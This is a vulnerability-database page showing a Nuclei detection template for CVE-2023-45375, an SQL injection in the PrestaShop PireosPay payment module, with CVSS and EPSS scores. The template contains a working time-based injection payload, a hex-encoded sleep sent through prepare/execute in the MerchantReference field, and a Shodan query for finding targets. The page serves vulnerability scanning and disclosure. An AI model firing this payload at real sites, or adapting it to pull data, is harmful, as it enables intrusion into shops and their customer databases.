Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-45375
HistoryMar 16, 2024 - 5:23 p.m.

PrestaShop PireosPay - SQL Injection

2024-03-1617:23:48
ProjectDiscovery
github.com
7
cve
cve2023
sqli
prestashop
pireospay

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

9.1 High

AI Score

Confidence

High

0.058 Low

EPSS

Percentile

93.4%

In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
id: CVE-2023-45375
info:
  name: PrestaShop PireosPay - SQL Injection
  author: MaStErChO
  severity: high
  description: |
    In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
  reference:
    - https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-45375
    cwe-id: CWE-89
    epss-score: 0.01204
    epss-percentile: 0.8517
    cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 01generator
    product: pireospay
    framework: prestashop
    shodan-query: "http.component:\"prestashop\""
  tags: cve,cve2023,sqli,prestashop,pireospay,01generator
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "/modules/pireospay/")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 10
        POST /module/pireospay/validation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--

    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 302
          - contains(content_type, "text/html")
        condition: and
# digest: 4b0a00483046022100f15c1bb56b22ab2f94529ddca1c0a06cbc06f0e07a1f56077c32b99e2c866bad022100b538a78680a96bcac30de2427b9197fa07b3502b9bf71699a5c9e5c50a88ac08:922c64590222798bb761d5b6d8e72950

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

9.1 High

AI Score

Confidence

High

0.058 Low

EPSS

Percentile

93.4%

Related for NUCLEI:CVE-2023-45375